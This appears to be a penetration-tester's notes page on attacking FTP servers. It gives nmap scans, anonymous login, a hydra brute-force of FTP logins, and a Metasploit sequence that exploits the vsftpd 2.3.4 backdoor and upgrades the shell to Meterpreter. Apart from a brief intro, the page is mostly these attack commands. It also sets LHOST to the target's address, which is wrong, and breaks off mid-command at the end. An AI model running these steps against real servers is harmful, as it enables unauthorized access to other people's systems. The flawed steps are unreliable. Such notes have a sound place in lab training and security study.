FTP
FTP (File Transfer Protocol) is a network protocol that allows files to be shared between a server and a client. It operates on TCP port 21 and is commonly used to transfer files to and from web servers.
To access an FTP server, a username and password are usually required. However, some FTP servers allow anonymous access, meaning anyone can connect without providing login credentials.
Since FTP uses password-based authentication, attackers can try brute-force attacks to guess valid login credentials. If an FTP server is misconfigured with weak security, it can become an easy target for unauthorized access.
Techniques
nmap -sV [TARGET IP]
ftp [TARGET IP]
> anonymous
# Bruteforce
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt [TARGET IP] -t 4 ftp
# using ftp
get [FILE]Exploitation
vsftpd is an FTP server for Linux and other Unix-based systems. It is the default FTP server for Ubuntu, CentOS, and Fedora.
vsftpd v2.3.4 has a command execution vulnerability caused by a backdoor secretly added to its download archive through a supply chain attack. This backdoor allows attackers to execute commands on the affected system, posing a serious security risk.
nmap -sS -sV -O [TARGET]
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
exploit
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
show options
set LHOST [TARGET]
set SESSIONLast updated